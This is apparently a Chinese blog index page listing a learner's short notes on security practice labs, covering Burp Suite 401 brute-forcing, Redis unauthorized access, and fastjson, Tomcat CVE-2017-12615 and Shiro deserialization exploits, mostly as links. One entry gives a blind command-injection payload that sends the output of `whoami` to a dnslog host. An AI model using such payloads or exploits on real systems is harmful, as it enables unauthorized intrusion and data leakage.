vcxvxcv - 博客园

2020年7月31日

burpsuite爆破401认证

摘要：好久没用了，有点忘了，记一下 https://blog.csdn.net/Testfan_zhou/article/details/92977543 阅读全文

posted @ 2020-07-31 14:04 vcxvxcv 阅读(2149) 评论(0) 推荐(0)

2020年7月28日

lkwa靶场之盲RCE

摘要： ping `whoami`.xv6dwy.dnslog.cn 阅读全文

posted @ 2020-07-28 05:51 vcxvxcv 阅读(370) 评论(0) 推荐(0)

2020年7月27日

redis未授权访问

摘要： docker搭建 https://github.com/vulhub/vulhub/tree/master/redis/4-unacc goby检测连接工具 https://github.com/microsoftarchive/redis/releases 利用 https://xz.aliyu 阅读全文

posted @ 2020-07-27 20:51 vcxvxcv 阅读(324) 评论(0) 推荐(0)

2020年7月26日

docker删除镜像+端口占用

摘要：小服务器经不起折腾，玩一次删一次 https://www.cnblogs.com/sea-stream/p/11100341.html 查看指定端口，可以结合grep命令： netstat -ap | grep 8080 若要关闭使用这个端口的程序，使用kill + 对应的pid kill -9 P 阅读全文

posted @ 2020-07-26 21:15 vcxvxcv 阅读(1819) 评论(0) 推荐(0)

fastjson 1.2.24反序列化

摘要： https://www.cnblogs.com/ssan/p/12844868.html 阅读全文

posted @ 2020-07-26 20:56 vcxvxcv 阅读(199) 评论(0) 推荐(0)

2020年7月25日

CVE-2017-12615Tomcat远程代码执行

摘要： https://github.com/RealBearcat/CVE-2017-12615 阅读全文

posted @ 2020-07-25 18:15 vcxvxcv 阅读(130) 评论(0) 推荐(0)

Shiro RememberMe 1.2.4 反序列化漏洞复现

摘要： bp检测插件 https://github.com/pmiaowu/BurpShiroPassiveScan https://www.cnblogs.com/paperpen/p/11312671.html https://github.com/feihong-cs/ShiroExploit/rel 阅读全文

posted @ 2020-07-25 17:01 vcxvxcv 阅读(370) 评论(0) 推荐(0)

2020年7月20日

day3

该文被密码保护。阅读全文

posted @ 2020-07-20 22:37 vcxvxcv 阅读(0) 评论(0) 推荐(0)

day2

该文被密码保护。阅读全文

posted @ 2020-07-20 22:02 vcxvxcv 阅读(0) 评论(0) 推荐(0)

2020年7月18日

day1

该文被密码保护。阅读全文

posted @ 2020-07-18 22:04 vcxvxcv 阅读(1) 评论(0) 推荐(0)

bcvbc

z

公告